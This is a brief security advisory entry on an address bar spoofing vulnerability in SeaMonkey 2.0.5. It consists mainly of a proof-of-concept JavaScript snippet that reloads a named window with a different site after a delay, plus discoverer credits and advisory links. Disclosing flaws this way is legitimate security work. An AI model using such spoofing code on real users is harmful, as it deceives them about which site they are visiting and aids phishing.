SeaMonkey 2.0.5 Address Bar Spoofing Vulnerability

2010-07-24T00:00:00
ID SECURITYVULNS:DOC:24322
Type securityvulns
Reporter Securityvulns
Modified 2010-07-24T00:00:00

Description

Spoof Code:

<script language="javascript"> function pause(pd) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < pd); } function Spoofing () { win = window.open('http://www.google.com','new') pause (13000) win = window.open('http://www.Securitylab.ir','new') } </script> <a href="javascript: Spoofing()">Click Here</a>

Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com) Original Advisory: http://pouya.info/blog/userfiles/pdf/SeaMonkey-ABS.pdf http://Securitylab.ir/Advisory